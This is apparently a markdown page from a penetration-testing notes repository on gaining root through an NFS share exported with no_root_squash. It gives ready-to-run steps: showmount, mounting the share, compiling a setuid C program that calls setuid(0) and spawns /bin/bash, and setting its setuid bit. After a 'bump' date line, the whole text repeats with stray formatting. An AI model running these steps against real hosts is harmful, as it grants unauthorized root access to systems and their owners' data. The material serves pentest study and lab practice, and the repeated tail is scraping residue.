killchain-compendium/exploit/linux/nfs_rootsquash.md

# NFS RootSquash

* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
* `no_root_squash` has to be as an option on the NFS device

## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`

* Connect to NFS share
```sh
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
```

* Create root shell inside the dir of the share
```sh
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell
```
bump 2021-10-23 02:03:06 +02:00			`# NFS RootSquash`

			`* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)`
			* `no_root_squash` has to be as an option on the NFS device

			`## Usage`
			* `showmount -e <target-IP>`
			* `mkdir /tmp/net_volume`

			`* Connect to NFS share`
			```sh
			`mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume`
			```

			`* Create root shell inside the dir of the share`
			```sh
			`echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c`
			`gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell`
			`chmod +s /tmp/net_volume/shell`
			```